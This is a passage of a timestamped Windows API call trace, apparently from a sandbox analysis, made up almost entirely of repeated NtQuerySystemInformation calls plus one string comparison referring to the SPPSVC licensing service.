Length=0x50, ResultLength=0x0) [0206.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfe0, Length=0x28, ResultLength=0x0) [0206.487] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0206.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd060, Length=0x50, ResultLength=0x0) [0206.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd060, Length=0x50, ResultLength=0x0) [0206.488] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.488] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd060, Length=0x50, ResultLength=0x0) [0206.488] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.488] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf90, Length=0x38, ResultLength=0x0) [0206.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdc0, Length=0x28, ResultLength=0x0) [0206.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdc0, Length=0x28, ResultLength=0x0) [0206.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdc0, Length=0x28, ResultLength=0x0) [0206.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce30, Length=0x28, ResultLength=0x0) [0206.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf90, Length=0x38, ResultLength=0x0) [0206.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfceb0, Length=0x28, ResultLength=0x0) [0206.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfceb0, Length=0x28, ResultLength=0x0) [0206.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf90, Length=0x38, ResultLength=0x0) [0206.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce10, Length=0x20, ResultLength=0x0) [0206.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd90, Length=0x20, ResultLength=0x0) [0206.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd90, Length=0x20, ResultLength=0x0) [0206.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd90, Length=0x20, ResultLength=0x0) [0206.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf90, Length=0x38, ResultLength=0x0) [0206.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce10, Length=0x20, ResultLength=0x0) [0206.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcda0, Length=0x20, ResultLength=0x0) [0206.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcda0, Length=0x20, ResultLength=0x0) [0206.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd090, Length=0x50, ResultLength=0x0) [0206.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd090, Length=0x50, ResultLength=0x0) [0206.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd090, Length=0x50, ResultLength=0x0) [0206.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf80, Length=0x50, ResultLength=0x0) [0206.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf80, Length=0x50, ResultLength=0x0) [0206.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf80, Length=0x50, ResultLength=0x0) [0206.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf80, Length=0x50, ResultLength=0x0) [0206.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfceb0, Length=0x38, ResultLength=0x0) [0206.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcce0, Length=0x28, ResultLength=0x0) [0206.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcce0, Length=0x28, ResultLength=0x0) [0206.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcce0, Length=0x28, ResultLength=0x0) [0206.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcce0, Length=0x28, ResultLength=0x0) [0206.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd50, Length=0x28, ResultLength=0x0) [0206.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfceb0, Length=0x38, ResultLength=0x0) [0206.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdd0, Length=0x28, ResultLength=0x0) [0206.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdd0, Length=0x28, ResultLength=0x0) [0206.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc70, Length=0x20, ResultLength=0x0) [0206.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbf0, Length=0x20, ResultLength=0x0) [0206.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbf0, Length=0x20, ResultLength=0x0) [0206.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbf0, Length=0x20, ResultLength=0x0) [0206.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfceb0, Length=0x38, ResultLength=0x0) [0206.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfceb0, Length=0x38, ResultLength=0x0) [0206.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd30, Length=0x20, ResultLength=0x0) [0206.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfccc0, Length=0x20, ResultLength=0x0) [0206.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfccc0, Length=0x20, ResultLength=0x0) [0206.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd090, Length=0x50, ResultLength=0x0) [0206.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd090, Length=0x50, ResultLength=0x0) [0206.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd090, Length=0x50, ResultLength=0x0) [0206.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf80, Length=0x50, ResultLength=0x0) [0206.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf80, Length=0x50, ResultLength=0x0) [0206.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf80, Length=0x50, ResultLength=0x0) [0206.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf80, Length=0x50, ResultLength=0x0) [0206.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfceb0, Length=0x38, ResultLength=0x0) [0206.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcce0, Length=0x28, ResultLength=0x0) [0206.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcce0, Length=0x28, ResultLength=0x0) [0206.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcce0, Length=0x28, ResultLength=0x0) [0206.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcce0, Length=0x28, ResultLength=0x0) [0206.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd50, Length=0x28, ResultLength=0x0) [0206.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfceb0, Length=0x38, ResultLength=0x0) [0206.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdd0, Length=0x28, ResultLength=0x0) [0206.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdd0, Length=0x28, ResultLength=0x0) [0206.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc70, Length=0x20, ResultLength=0x0) [0206.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbf0, Length=0x20, ResultLength=0x0) [0206.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbf0, Length=0x20, ResultLength=0x0) [0206.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbf0, Length=0x20, ResultLength=0x0) [0206.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfceb0, Length=0x38, ResultLength=0x0) [0206.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfceb0, Length=0x38, ResultLength=0x0) [0206.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd30, Length=0x20, ResultLength=0x0) [0206.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfccc0, Length=0x20, ResultLength=0x0) [0206.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfccc0, Length=0x20, ResultLength=0x0) [0206.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd650, Length=0x28, ResultLength=0x0) [0206.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd598, Length=0x28, ResultLength=0x0) [0206.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd598, Length=0x28, ResultLength=0x0) [0206.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd598, Length=0x28, ResultLength=0x0) [0206.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd598, Length=0x28, ResultLength=0x0) [0206.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd598, Length=0x28, ResultLength=0x0) [0206.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd598, Length=0x28, ResultLength=0x0) [0206.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd598, Length=0x28, ResultLength=0x0) [0206.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd500, Length=0x20, ResultLength=0x0) [0206.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd500, Length=0x20, ResultLength=0x0) [0206.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd598, Length=0x28, ResultLength=0x0) [0206.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd510, Length=0x40, ResultLength=0x0) [0206.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd510, Length=0x40, ResultLength=0x0) [0206.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3c0, Length=0x20, ResultLength=0x0) [0206.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3c0, Length=0x20, ResultLength=0x0) [0206.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd510, Length=0x40, ResultLength=0x0) [0206.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd510, Length=0x40, ResultLength=0x0) [0206.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd510, Length=0x40, ResultLength=0x0) [0206.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd470, Length=0x20, ResultLength=0x0) [0206.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd470, Length=0x20, ResultLength=0x0) [0206.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd470, Length=0x20, ResultLength=0x0) [0206.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.517] 